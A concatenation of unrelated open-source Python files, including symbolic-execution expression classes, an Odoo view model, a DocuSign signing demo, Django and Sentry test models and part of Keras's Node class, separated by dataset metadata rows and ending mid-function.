if isinstance(a, BitVec) or isinstance(b, BitVec):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class GreaterThan(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class GreaterOrEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class UnsignedLessThan(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a, b, *args, **kwargs)
assert a.size == b.size
class UnsignedLessOrEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class UnsignedGreaterThan(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class UnsignedGreaterOrEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
super(UnsignedGreaterOrEqual, self).__init__(a, b, *args, **kwargs)
###############################################################################
# Array BV32 -> BV8 or BV64 -> BV8
class Array(Expression):
def __init__(
self, index_bits: int, index_max: Optional[int], value_bits: int, *operands, **kwargs
):
assert index_bits in (32, 64, 256)
assert value_bits in (8, 16, 32, 64, 256)
assert index_max is None or index_max >= 0 and index_max < 2 ** index_bits
self._index_bits = index_bits
self._index_max = index_max
self._value_bits = value_bits
super().__init__(*operands, **kwargs)
assert type(self) is not Array, "Abstract class"
def _get_size(self, index):
start, stop = self._fix_index(index)
size = stop - start
if isinstance(size, BitVec):
from .visitors import simplify
size = simplify(size)
else:
size = BitVecConstant(self.index_bits, size)
assert isinstance(size, BitVecConstant)
return size.value
def _fix_index(self, index):
"""
:param slice index:
"""
stop, start = index.stop, index.start
if start is None:
start = 0
if stop is None:
stop = len(self)
return start, stop
def cast(self, possible_array):
if isinstance(possible_array, bytearray):
# FIXME This should be related to a constrainSet
arr = ArrayVariable(self.index_bits, len(possible_array), 8)
for pos, byte in enumerate(possible_array):
arr = arr.store(pos, byte)
return arr
raise ValueError # cast not implemented
def cast_index(self, index: Union[int, "BitVec"]) -> Union["BitVecConstant", "BitVec"]:
if isinstance(index, int):
# assert self.index_max is None or index >= 0 and index < self.index_max
return BitVecConstant(self.index_bits, index)
assert index.size == self.index_bits
return index
def cast_value(
self, value: Union["BitVec", str, bytes, int]
) -> Union["BitVecConstant", "BitVec"]:
if isinstance(value, BitVec):
assert value.size == self.value_bits
return value
if isinstance(value, (str, bytes)) and len(value) == 1:
value = ord(value)
if not isinstance(value, int):
value = int(value)
return BitVecConstant(self.value_bits, value)
def __len__(self):
if self.index_max is None:
raise ExpressionException("Array max index not set")
return self.index_max
@property
def index_bits(self):
return self._index_bits
@property
def value_bits(self):
return self._value_bits
@property
def index_max(self):
return self._index_max
def select(self, index):
index = self.cast_index(index)
return ArraySelect(self, index)
def store(self, index, value):
return ArrayStore(self, self.cast_index(index), self.cast_value(value))
def write(self, offset, buf):
if not isinstance(buf, (Array, bytearray)):
raise TypeError("Array or bytearray expected got {:s}".format(type(buf)))
arr = self
for i, val in enumerate(buf):
arr = arr.store(offset + i, val)
return arr
def read(self, offset, size):
return ArraySlice(self, offset, size)
def __getitem__(self, index):
if isinstance(index, slice):
start, stop = self._fix_index(index)
size = self._get_size(index)
return ArraySlice(self, start, size)
else:
if self.index_max is not None:
if not isinstance(index, Expression) and index >= self.index_max:
raise IndexError
return self.select(self.cast_index(index))
def __eq__(self, other):
# FIXME taint
def compare_buffers(a, b):
if len(a) != len(b):
return BoolConstant(False)
cond = BoolConstant(True)
for i in range(len(a)):
cond = BoolAnd(cond.cast(a[i] == b[i]), cond)
if cond is BoolConstant(False):
return BoolConstant(False)
return cond
return compare_buffers(self, other)
def __ne__(self, other):
return BoolNot(self == other)
def __hash__(self):
return super().__hash__()
@property
def underlying_variable(self):
array = self
while not isinstance(array, ArrayVariable):
array = array.array
return array
def read_BE(self, address, size):
bytes = []
for offset in range(size):
bytes.append(self.get(address + offset, 0))
return BitVecConcat(size * self.value_bits, *bytes)
def read_LE(self, address, size):
address = self.cast_index(address)
bytes = []
for offset in range(size):
bytes.append(self.get(address + offset, 0))
return BitVecConcat(size * self.value_bits, *reversed(bytes))
def write_BE(self, address, value, size):
address = self.cast_index(address)
value = BitVec(size * self.value_bits).cast(value)
array = self
for offset in range(size):
array = array.store(
address + offset,
BitVecExtract(value, (size - 1 - offset) * self.value_bits, self.value_bits),
)
return array
def write_LE(self, address, value, size):
address = self.cast_index(address)
value = BitVec(size * self.value_bits).cast(value)
array = self
for offset in reversed(range(size)):
array = array.store(
address + offset,
BitVecExtract(value, (size - 1 - offset) * self.value_bits, self.value_bits),
)
return array
def __add__(self, other):
if not isinstance(other, (Array, bytearray)):
raise TypeError("can't concat Array to {}".format(type(other)))
if isinstance(other, Array):
if self.index_bits != other.index_bits or self.value_bits != other.value_bits:
raise ValueError("Array sizes do not match for concatenation")
from .visitors import simplify
# FIXME This should be related to a constrainSet
new_arr = ArrayProxy(
ArrayVariable(
self.index_bits,
self.index_max + len(other),
self.value_bits,
"concatenation{}".format(uuid.uuid1()),
)
)
for index in range(self.index_max):
new_arr[index] = simplify(self[index])
for index in range(len(other)):
new_arr[index + self.index_max] = simplify(other[index])
return new_arr
def __radd__(self, other):
if not isinstance(other, (Array, bytearray, bytes)):
raise TypeError("can't concat Array to {}".format(type(other)))
if isinstance(other, Array):
if self.index_bits != other.index_bits or self.value_bits != other.value_bits:
raise ValueError("Array sizes do not match for concatenation")
from .visitors import simplify
# FIXME This should be related to a constrainSet
new_arr = ArrayProxy(
ArrayVariable(
self.index_bits,
self.index_max + len(other),
self.value_bits,
"concatenation{}".format(uuid.uuid1()),
)
)
for index in range(len(other)):
new_arr[index] = simplify(other[index])
_concrete_cache = new_arr._concrete_cache
for index in range(self.index_max):
new_arr[index + len(other)] = simplify(self[index])
new_arr._concrete_cache.update(_concrete_cache)
return new_arr
class ArrayVariable(Array, Variable):
def __init__(self, index_bits, index_max, value_bits, name, *operands, **kwargs):
super().__init__(index_bits, index_max, value_bits, name, **kwargs)
@property
def declaration(self):
return f"(declare-fun {self.name} () (Array (_ BitVec {self.index_bits}) (_ BitVec {self.value_bits})))"
class ArrayOperation(Array, Operation):
def __init__(self, array: Array, *operands, **kwargs):
super().__init__(
array.index_bits, array.index_max, array.value_bits, array, *operands, **kwargs
)
class ArrayStore(ArrayOperation):
def __init__(self, array: "Array", index: "BitVec", value: "BitVec", *args, **kwargs):
assert index.size == array.index_bits
assert value.size == array.value_bits
super().__init__(array, index, value, *args, **kwargs)
@property
def array(self):
return self.operands[0]
@property
def name(self):
return self.operands[0].name
@property
def index(self):
return self.operands[1]
@property
def value(self):
return self.operands[2]
class ArraySlice(Array):
def __init__(
self, array: Union["Array", "ArrayProxy"], offset: int, size: int, *args, **kwargs
):
if not isinstance(array, Array):
raise ValueError("Array expected")
if isinstance(array, ArrayProxy):
array = array._array
super().__init__(array.index_bits, array.index_max, array.value_bits, *args, **kwargs)
self._array = array
self._slice_offset = offset
self._slice_size = size
@property
def underlying_variable(self):
return self._array.underlying_variable
@property
def operands(self):
return self._array.operands
@property
def index_bits(self):
return self._array.index_bits
@property
def index_max(self):
return self._slice_size
@property
def value_bits(self):
return self._array.value_bits
@property
def taint(self):
return self._array.taint
def select(self, index):
return self._array.select(index + self._slice_offset)
def store(self, index, value):
return ArraySlice(
self._array.store(index + self._slice_offset, value),
self._slice_offset,
self._slice_size,
)
class ArrayProxy(Array):
def __init__(self, array: Array, default: Optional[int] = None):
self._default = default
self._concrete_cache: Dict[int, int] = {}
self._written = None
if isinstance(array, ArrayProxy):
# copy constructor
super().__init__(array.index_bits, array.index_max, array.value_bits)
self._array: Array = array._array
self._name: str = array._name
if default is None:
self._default = array._default
self._concrete_cache = dict(array._concrete_cache)
self._written = set(array.written)
elif isinstance(array, ArrayVariable):
# fresh array proxy
super().__init__(array.index_bits, array.index_max, array.value_bits)
self._array = array
self._name = array.name
else:
# arrayproxy for a prepopulated array
super().__init__(array.index_bits, array.index_max, array.value_bits)
self._name = array.underlying_variable.name
self._array = array
@property
def underlying_variable(self):
return self._array.underlying_variable
@property
def array(self):
return self._array
@property
def name(self):
return self._name
@property
def operands(self):
return self._array.operands
@property
def index_bits(self):
return self._array.index_bits
@property
def index_max(self):
return self._array.index_max
@property
def value_bits(self):
return self._array.value_bits
@property
def taint(self):
return self._array.taint
def select(self, index):
return self.get(index)
def store(self, index, value):
if not isinstance(index, Expression):
index = self.cast_index(index)
if not isinstance(value, Expression):
value = self.cast_value(value)
from .visitors import simplify
index = simplify(index)
if isinstance(index, Constant):
self._concrete_cache[index.value] = value
else:
# delete all cache as we do not know what this may overwrite.
self._concrete_cache = {}
# potentially generate and update .written set
self.written.add(index)
self._array = self._array.store(index, value)
return self
def __getitem__(self, index):
if isinstance(index, slice):
start, stop = self._fix_index(index)
size = self._get_size(index)
array_proxy_slice = ArrayProxy(ArraySlice(self, start, size), default=self._default)
array_proxy_slice._concrete_cache = {}
for k, v in self._concrete_cache.items():
if k >= start and k < start + size:
array_proxy_slice._concrete_cache[k - start] = v
for i in self.written:
array_proxy_slice.written.add(i - start)
return array_proxy_slice
else:
if self.index_max is not None:
if not isinstance(index, Expression) and index >= self.index_max:
raise IndexError
return self.get(index, self._default)
def __setitem__(self, index, value):
if isinstance(index, slice):
start, stop = self._fix_index(index)
size = self._get_size(index)
assert len(value) == size
for i in range(size):
self.store(start + i, value[i])
else:
self.store(index, value)
def __getstate__(self):
state = {}
state["_default"] = self._default
state["_array"] = self._array
state["name"] = self.name
state["_concrete_cache"] = self._concrete_cache
state["_written"] = self._written
return state
def __setstate__(self, state):
self._default = state["_default"]
self._array = state["_array"]
self._name = state["name"]
self._concrete_cache = state["_concrete_cache"]
self._written = state["_written"]
def __copy__(self):
return ArrayProxy(self)
@property
def written(self):
# Calculate only first time
if self._written is None:
written = set()
# take out Proxy sleve
array = self._array
offset = 0
while isinstance(array, ArraySlice):
# if it is a proxy over a slice take out the slice too
offset += array._slice_offset
array = array._array
while not isinstance(array, ArrayVariable):
# The index written to underlaying Array are displaced when sliced
written.add(array.index - offset)
array = array.array
assert isinstance(array, ArrayVariable)
self._written = written
return self._written
def is_known(self, index):
if isinstance(index, Constant) and index.value in self._concrete_cache:
return BoolConstant(True)
is_known_index = BoolConstant(False)
written = self.written
for known_index in written:
if isinstance(index, Constant) and isinstance(known_index, Constant):
if known_index.value == index.value:
return BoolConstant(True)
is_known_index = BoolOr(is_known_index.cast(index == known_index), is_known_index)
return is_known_index
def get(self, index, default=None):
if default is None:
default = self._default
index = self.cast_index(index)
if self.index_max is not None:
from .visitors import simplify
index = simplify(
BitVecITE(self.index_bits, index < 0, self.index_max + index + 1, index)
)
if isinstance(index, Constant) and index.value in self._concrete_cache:
return self._concrete_cache[index.value]
value = self._array.select(index)
if default is None:
return value
is_known = self.is_known(index)
default = self.cast_value(default)
return BitVecITE(self._array.value_bits, is_known, value, default)
class ArraySelect(BitVec, Operation):
def __init__(self, array: "Array", index: "BitVec", *args, **kwargs):
assert index.size == array.index_bits
super().__init__(array.value_bits, array, index, *args, **kwargs)
@property
def array(self):
return self.operands[0]
@property
def index(self):
return self.operands[1]
def __repr__(self):
return f"<ArraySelect obj with index={self.index}:\n{self.array}>"
class BitVecSignExtend(BitVecOperation):
def __init__(self, operand: "BitVec", size_dest: int, *args, **kwargs):
assert size_dest >= operand.size
super().__init__(size_dest, operand, *args, **kwargs)
self.extend = size_dest - operand.size
class BitVecZeroExtend(BitVecOperation):
def __init__(self, size_dest: int, operand: "BitVec", *args, **kwargs):
assert size_dest >= operand.size
super().__init__(size_dest, operand, *args, **kwargs)
self.extend = size_dest - operand.size
class BitVecExtract(BitVecOperation):
def __init__(self, operand: "BitVec", offset: int, size: int, *args, **kwargs):
assert offset >= 0 and offset + size <= operand.size
super().__init__(size, operand, *args, **kwargs)
self._begining = offset
self._end = offset + size - 1
@property
def value(self):
return self.operands[0]
@property
def begining(self):
return self._begining
@property
def end(self):
return self._end
class BitVecConcat(BitVecOperation):
def __init__(self, size_dest: int, *operands, **kwargs):
assert all(isinstance(x, BitVec) for x in operands)
assert size_dest == sum(x.size for x in operands)
super().__init__(size_dest, *operands, **kwargs)
class BitVecITE(BitVecOperation):
def __init__(
self,
size: int,
condition: Union["Bool", bool],
true_value: "BitVec",
false_value: "BitVec",
*args,
**kwargs,
):
assert true_value.size == size
assert false_value.size == size
super().__init__(size, condition, true_value, false_value, *args, **kwargs)
| apache-2.0 | 5,668,414,571,755,638,000 | 29.555648 | 133 | 0.578651 | false | 3.842595 | false | false | false |
optima-ict/odoo | addons/web_editor/models/ir_ui_view.py | 40 | 4947 | # -*- coding: utf-8 -*-
import copy
import openerp
from openerp.exceptions import AccessError
from openerp.osv import osv
from lxml import etree, html
from openerp import api
class view(osv.osv):
_inherit = 'ir.ui.view'
@api.cr_uid_ids_context
def render(self, cr, uid, id_or_xml_id, values=None, engine='ir.qweb', context=None):
if not values:
values = {}
if values.get('editable'):
try:
if not isinstance(id_or_xml_id, (int, long)):
if '.' not in id_or_xml_id:
raise ValueError('Invalid template id: %r' % (id_or_xml_id,))
id_or_xml_id = self.get_view_id(cr, uid, id_or_xml_id, context=context)
self.check_access_rule(cr, uid, [id_or_xml_id], 'write', context=context)
except AccessError:
values['editable'] = False
return super(view, self).render(cr, uid, id_or_xml_id, values=values, engine=engine, context=context)
#------------------------------------------------------
# Save from html
#------------------------------------------------------
def extract_embedded_fields(self, cr, uid, arch, context=None):
return arch.xpath('//*[@data-oe-model != "ir.ui.view"]')
def save_embedded_field(self, cr, uid, el, context=None):
Model = self.pool[el.get('data-oe-model')]
field = el.get('data-oe-field')
converter = self.pool['ir.qweb'].get_converter_for(el.get('data-oe-type'))
value = converter.from_html(cr, uid, Model, Model._fields[field], el)
if value is not None:
# TODO: batch writes?
Model.write(cr, uid, [int(el.get('data-oe-id'))], {
field: value
}, context=context)
def _pretty_arch(self, arch):
# remove_blank_string does not seem to work on HTMLParser, and
# pretty-printing with lxml more or less requires stripping
# whitespace: http://lxml.de/FAQ.html#why-doesn-t-the-pretty-print-option-reformat-my-xml-output
# so serialize to XML, parse as XML (remove whitespace) then serialize
# as XML (pretty print)
arch_no_whitespace = etree.fromstring(
etree.tostring(arch, encoding='utf-8'),
parser=etree.XMLParser(encoding='utf-8', remove_blank_text=True))
return etree.tostring(
arch_no_whitespace, encoding='unicode', pretty_print=True)
def replace_arch_section(self, cr, uid, view_id, section_xpath, replacement, context=None):
# the root of the arch section shouldn't actually be replaced as it's
# not really editable itself, only the content truly is editable.
[view] = self.browse(cr, uid, [view_id], context=context)
arch = etree.fromstring(view.arch.encode('utf-8'))
# => get the replacement root
if not section_xpath:
root = arch
else:
# ensure there's only one match
[root] = arch.xpath(section_xpath)
root.text = replacement.text
root.tail = replacement.tail
# replace all children
del root[:]
for child in replacement:
root.append(copy.deepcopy(child))
return arch
def to_field_ref(self, cr, uid, el, context=None):
# filter out meta-information inserted in the document
attributes = dict((k, v) for k, v in el.items()
if not k.startswith('data-oe-'))
attributes['t-field'] = el.get('data-oe-expression')
out = html.html_parser.makeelement(el.tag, attrib=attributes)
out.tail = el.tail
return out
def save(self, cr, uid, res_id, value, xpath=None, context=None):
""" Update a view section. The view section may embed fields to write
:param str model:
:param int res_id:
:param str xpath: valid xpath to the tag to replace
"""
res_id = int(res_id)
arch_section = html.fromstring(
value, parser=html.HTMLParser(encoding='utf-8'))
if xpath is None:
# value is an embedded field on its own, not a view section
self.save_embedded_field(cr, uid, arch_section, context=context)
return
for el in self.extract_embedded_fields(cr, uid, arch_section, context=context):
self.save_embedded_field(cr, uid, el, context=context)
# transform embedded field back to t-field
el.getparent().replace(el, self.to_field_ref(cr, uid, el, context=context))
arch = self.replace_arch_section(cr, uid, res_id, xpath, arch_section, context=context)
self.write(cr, uid, res_id, {
'arch': self._pretty_arch(arch)
}, context=context)
view = self.browse(cr, openerp.SUPERUSER_ID, res_id, context=context)
if view.model_data_id:
view.model_data_id.write({'noupdate': True})
| agpl-3.0 | -3,438,966,866,468,648,000 | 38.576 | 109 | 0.585203 | false | 3.837859 | false | false | false |
necula01/bond | pybond/setup.py | 1 | 1281 | from distutils.core import setup
import os
here_dir = os.path.abspath(os.path.dirname(__file__))
def readme():
with open(os.path.join(here_dir, 'README.rst')) as f:
return f.read()
setup(
name='bond',
packages=['bond', 'bond.bond_helpers'],
version='1.1.0',
description='Testing with Spies and Mocks',
long_description=readme(),
summary='Testing with Spies and Mocks',
author='George Necula, Erik Krogen',
author_email='[email protected]',
url='http://necula01.github.io/bond/',
license='BSD',
keywords=['testing', 'mocking'],
package_dir={
'bond' : 'bond'
},
package_data={
'bond' : [ 'AUTHORS.rst', 'LICENSE', 'README.rst']
},
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Natural Language :: English",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Software Development :: Libraries :: Python Modules",
'Topic :: Software Development :: Testing'
]
)
| bsd-2-clause | 3,115,033,225,373,236,700 | 30.243902 | 71 | 0.594848 | false | 3.789941 | false | false | false |
kbussell/pydocusign | demo/embeddedsigning.py | 1 | 5150 | #!/usr/bin/env python
# coding=utf-8
"""Sample script that demonstrates `pydocusign` usage for embedded signing.
See also http://iodocs.docusign.com/APIWalkthrough/embeddedSigning
"""
from __future__ import print_function
import hashlib
import os
import uuid
import pydocusign
from pydocusign.test import fixtures_dir
try:
raw_input
except NameError:
raw_input = input
def prompt(environ_key, description, default):
try:
return os.environ[environ_key]
except KeyError:
value = raw_input('{description} (default: "{default}"): '.format(
default=default, description=description))
if not value:
return default
else:
return value
# Get configuration from environment or prompt the user...
root_url = prompt(
'DOCUSIGN_ROOT_URL',
'DocuSign API URL',
'https://demo.docusign.net/restapi/v2')
username = prompt(
'DOCUSIGN_USERNAME',
'DocuSign API username',
'')
password = prompt(
'DOCUSIGN_PASSWORD',
'DocuSign API password',
'')
integrator_key = prompt(
'DOCUSIGN_INTEGRATOR_KEY',
'DocuSign API integrator key',
'')
callback_url = prompt(
'DOCUSIGN_TEST_CALLBACK_URL',
'Envelope callback URL',
'')
signer_return_url = prompt(
'DOCUSIGN_TEST_SIGNER_RETURN_URL',
'Signer return URL',
'')
# Create a client.
client = pydocusign.DocuSignClient(
root_url=root_url,
username=username,
password=password,
integrator_key=integrator_key,
)
# Login. Updates API URLs in client.
print("1. GET /login_information")
login_information = client.login_information()
print(" Received data: {data}".format(data=login_information))
# Prepare list of signers. Ordering matters.
signers = [
pydocusign.Signer(
email='[email protected]',
name=u'Jean Français',
recipientId=1,
clientUserId=str(uuid.uuid4()), # Something unique in your database.
tabs=[
pydocusign.SignHereTab(
documentId=1,
pageNumber=1,
xPosition=100,
yPosition=100,
),
],
emailSubject='Voici un sujet',
emailBody='Voici un message',
supportedLanguage='fr',
),
pydocusign.Signer(
email='[email protected]',
name=u'Paul English',
recipientId=2,
clientUserId=str(uuid.uuid4()), # Something unique in your database.
tabs=[], # No tabs means user places tabs himself in DocuSign UI.
emailSubject='Here is a subject',
emailBody='Here is a message',
supportedLanguage='en',
),
]
# Create envelope with embedded signing.
print("2. POST {account}/envelopes")
event_notification = pydocusign.EventNotification(
url=callback_url,
)
document_path = os.path.join(fixtures_dir(), 'test.pdf')
document_2_path = os.path.join(fixtures_dir(), 'test2.pdf')
with open(document_path, 'rb') as pdf, open(document_2_path, 'rb') as pdf_2:
envelope = pydocusign.Envelope(
documents=[
pydocusign.Document(
name='document.pdf',
documentId=1,
data=pdf,
),
pydocusign.Document(
name='document_2.pdf',
documentId=2,
data=pdf_2,
),
],
emailSubject='This is the subject',
emailBlurb='This is the body',
eventNotification=event_notification,
status=pydocusign.Envelope.STATUS_SENT,
recipients=signers,
)
client.create_envelope_from_documents(envelope)
print(" Received envelopeId {id}".format(id=envelope.envelopeId))
# Update recipient list of envelope: fetch envelope's ``UserId`` from DocuSign.
print("3. GET {account}/envelopes/{envelopeId}/recipients")
envelope.get_recipients()
print(" Received UserId for recipient 0: {0}".format(
envelope.recipients[0].userId))
print(" Received UserId for recipient 1: {0}".format(
envelope.recipients[1].userId))
# Retrieve embedded signing for first recipient.
print("4. Get DocuSign Recipient View")
signing_url = envelope.post_recipient_view(
envelope.recipients[0],
returnUrl=signer_return_url)
print(" Received signing URL for recipient 0: {0}".format(signing_url))
signing_url = envelope.post_recipient_view(
envelope.recipients[1],
returnUrl=signer_return_url)
print(" Received signing URL for recipient 1: {0}".format(signing_url))
# Download signature documents.
print("5. List signature documents.")
document_list = envelope.get_document_list()
print(" Received document list: {0}".format(document_list))
print("6. Download documents from DocuSign.")
for signed_document in document_list:
document = envelope.get_document(signed_document['documentId'])
document_sha = hashlib.sha1(document.read()).hexdigest()
print(" Document SHA1: {0}".format(document_sha))
print("7. Download signature certificate from DocuSign.")
document = envelope.get_certificate()
document_sha = hashlib.sha1(document.read()).hexdigest()
print(" Certificate SHA1: {0}".format(document_sha))
| bsd-3-clause | 5,006,633,623,284,871,000 | 28.936047 | 79 | 0.655661 | false | 3.688395 | false | false | false |
elky/django | tests/update/models.py | 79 | 1083 | """
Tests for the update() queryset method that allows in-place, multi-object
updates.
"""
from django.db import models
class DataPoint(models.Model):
name = models.CharField(max_length=20)
value = models.CharField(max_length=20)
another_value = models.CharField(max_length=20, blank=True)
def __str__(self):
return self.name
class RelatedPoint(models.Model):
name = models.CharField(max_length=20)
data = models.ForeignKey(DataPoint, models.CASCADE)
def __str__(self):
return self.name
class A(models.Model):
x = models.IntegerField(default=10)
class B(models.Model):
a = models.ForeignKey(A, models.CASCADE)
y = models.IntegerField(default=10)
class C(models.Model):
y = models.IntegerField(default=10)
class D(C):
a = models.ForeignKey(A, models.CASCADE)
class Foo(models.Model):
target = models.CharField(max_length=10, unique=True)
class Bar(models.Model):
foo = models.ForeignKey(Foo, models.CASCADE, to_field='target')
m2m_foo = models.ManyToManyField(Foo, related_name='m2m_foo')
| bsd-3-clause | 8,444,251,057,236,665,000 | 21.102041 | 73 | 0.692521 | false | 3.40566 | false | false | false |
mvaled/sentry | tests/sentry/api/serializers/test_alert_rule.py | 1 | 1670 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import six
from sentry.api.serializers import serialize
from sentry.incidents.logic import create_alert_rule
from sentry.incidents.models import AlertRuleThresholdType
from sentry.snuba.models import QueryAggregations
from sentry.testutils import TestCase
class AlertRuleSerializerTest(TestCase):
def test_simple(self):
alert_rule = create_alert_rule(
self.organization,
[self.project],
"hello",
AlertRuleThresholdType.ABOVE,
"level:error",
QueryAggregations.TOTAL,
10,
1000,
400,
1,
)
result = serialize(alert_rule)
assert result["id"] == six.text_type(alert_rule.id)
assert result["projectId"] == six.text_type(
alert_rule.query_subscriptions.first().project_id
)
assert result["name"] == alert_rule.name
assert result["thresholdType"] == alert_rule.threshold_type
assert result["dataset"] == alert_rule.dataset
assert result["query"] == alert_rule.query
assert result["aggregation"] == alert_rule.aggregation
assert result["timeWindow"] == alert_rule.time_window
assert result["resolution"] == alert_rule.resolution
assert result["alertThreshold"] == alert_rule.alert_threshold
assert result["resolveThreshold"] == alert_rule.resolve_threshold
assert result["thresholdPeriod"] == alert_rule.threshold_period
assert result["dateModified"] == alert_rule.date_modified
assert result["dateAdded"] == alert_rule.date_added
| bsd-3-clause | 8,378,937,955,324,917,000 | 36.111111 | 73 | 0.645509 | false | 4.348958 | false | false | false |
aam-at/tensorflow | tensorflow/python/keras/engine/node.py | 5 | 11372 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
"""Contains the `Node` class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import backend
from tensorflow.python.keras.engine import base_layer_utils
from tensorflow.python.keras.engine import keras_tensor
from tensorflow.python.keras.saving.saved_model import json_utils
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.util import nest
_CONSTANT_VALUE = '_CONSTANT_VALUE'
class Node(object):
"""A `Node` describes the connectivity between two layers.
Each time a layer is connected to some new input,
a node is added to `layer._inbound_nodes`.
Each time the output of a layer is used by another layer,
a node is added to `layer._outbound_nodes`.
Arguments:
layer: The Layer for the Layer.__call__ this node represents.
call_args: The positional arguments the Layer was called with.
call_kwargs: The keyword arguments the Layer was called with.
outputs: The outputs of the Layer.__call__
"""
def __init__(self,
layer,
call_args=None,
call_kwargs=None,
outputs=None):
call_args = [] if call_args is None else call_args
call_kwargs = {} if call_kwargs is None else call_kwargs
outputs = [] if outputs is None else outputs
self.layer = layer
self.is_input = not call_args and not call_kwargs
# These arguments are user-provided. Copy the structures here so that
# future user modifications do not affect the node's metadata.
# We copy using map_structure rather than python's shallow or deep copy,
# because the args can be data structures (so shallow copy is
# insufficient), but individual values might not support copy.copy
# or be too expensive to deep copy.
call_args = nest.map_structure(lambda t: t, call_args)
call_kwargs = nest.map_structure(lambda t: t, call_kwargs)
self.outputs = nest.map_structure(lambda t: t, outputs)
self.call_args = call_args
self.call_kwargs = call_kwargs
# Cached for performance.
self._flat_arguments = nest.flatten((self.call_args, self.call_kwargs))
# Used to avoid expensive `nest` operations in the most common case.
self._single_positional_tensor_passed = (not self.call_kwargs and len(
self.call_args) == 1 and tensor_util.is_tensor(self.call_args[0]))
if not keras_tensor.keras_tensors_enabled():
# Create TensorFlowOpLayers if needed.
for obj in self._flat_arguments:
if (isinstance(obj, ops.Tensor) and
base_layer_utils.needs_keras_history(
obj, ignore_call_context=True)):
base_layer_utils.create_keras_history(obj)
self._keras_inputs = []
self._keras_inputs_ids_and_indices = []
for i, ele in enumerate(self._flat_arguments):
if is_keras_tensor(ele):
self._keras_inputs.append(ele)
kt_id = str(id(ele))
kt_index = i
self._keras_inputs_ids_and_indices.append((kt_id, kt_index))
# Wire up Node to Layers.
self.layer._inbound_nodes.append(self)
for kt in self.keras_inputs:
inbound_layer = kt._keras_history.layer
if inbound_layer is not None: # `None` for `Input` tensors.
inbound_layer._outbound_nodes.append(self)
# Set metadata on outputs.
node_index = len(self.layer._inbound_nodes) - 1
for i, tensor in enumerate(nest.flatten(outputs)):
tensor._keras_history = KerasHistory(
layer=layer, node_index=node_index, tensor_index=i)
# Cached for performance.
self.flat_input_ids = [str(id(t)) for t in self._keras_inputs]
self.flat_output_ids = [str(id(t)) for t in nest.flatten(self.outputs)]
@property
def keras_inputs(self):
"""Tensors input to this node that can be traced back to a `keras.Input`."""
return self._keras_inputs
@property
def parent_nodes(self):
"""Returns all the `Node`s whose output this node immediately depends on."""
node_deps = []
for kt in self.keras_inputs:
layer = kt._keras_history.layer
node_index = kt._keras_history.node_index
if layer is not None: # `None` for `Input` tensors.
node_deps.append(layer._inbound_nodes[node_index])
return node_deps
def iterate_inbound(self):
"""Yields tuples representing the data inbound from other nodes.
Yields:
tuples like: (inbound_layer, node_index, tensor_index, tensor).
"""
for kt in self.keras_inputs:
keras_history = kt._keras_history
layer = keras_history.layer
node_index = keras_history.node_index
tensor_index = keras_history.tensor_index
yield layer, node_index, tensor_index, kt
def map_arguments(self, tensor_dict):
"""Maps Keras Tensors to computed Tensors using `tensor_dict`."""
if self._single_positional_tensor_passed:
# Performance optimization for most common case.
kt_id, _ = self._keras_inputs_ids_and_indices[0]
return (tensor_dict[kt_id].pop(),), {}
else:
flat_arguments = copy.copy(self._flat_arguments)
for kt_id, kt_index in self._keras_inputs_ids_and_indices:
flat_arguments[kt_index] = tensor_dict[kt_id].pop()
args, kwargs = nest.pack_sequence_as((self.call_args, self.call_kwargs),
flat_arguments)
return args, kwargs
def serialize(self, make_node_key, node_conversion_map):
"""Serializes `Node` for Functional API's `get_config`."""
# Serialization still special-cases first argument.
args, kwargs = self.call_args, self.call_kwargs
inputs, args, kwargs = self.layer._split_out_first_arg(args, kwargs)
# Treat everything other than first argument as a kwarg.
arguments = dict(zip(self.layer._call_fn_args[1:], args))
arguments.update(kwargs)
kwargs = arguments
def _serialize_keras_tensor(t):
"""Serializes a single Tensor passed to `call`."""
if hasattr(t, '_keras_history'):
kh = t._keras_history
node_index = kh.node_index
node_key = make_node_key(kh.layer.name, node_index)
new_node_index = node_conversion_map.get(node_key, 0)
return [kh.layer.name, new_node_index, kh.tensor_index]
if isinstance(t, np.ndarray):
return t.tolist()
if isinstance(t, ops.Tensor):
return backend.get_value(t).tolist()
return t
kwargs = nest.map_structure(_serialize_keras_tensor, kwargs)
try:
json.dumps(kwargs, default=json_utils.get_json_type)
except TypeError:
kwarg_types = nest.map_structure(type, kwargs)
raise TypeError('Layer ' + self.layer.name +
' was passed non-JSON-serializable arguments. ' +
'Arguments had types: ' +
str(kwarg_types) + '. They cannot be serialized out '
'when saving the model.')
# `kwargs` is added to each Tensor in the first arg. This should be
# changed in a future version of the serialization format.
def serialize_first_arg_tensor(t):
if is_keras_tensor(t):
kh = t._keras_history
node_index = kh.node_index
node_key = make_node_key(kh.layer.name, node_index)
new_node_index = node_conversion_map.get(node_key, 0)
data = [kh.layer.name, new_node_index, kh.tensor_index, kwargs]
else:
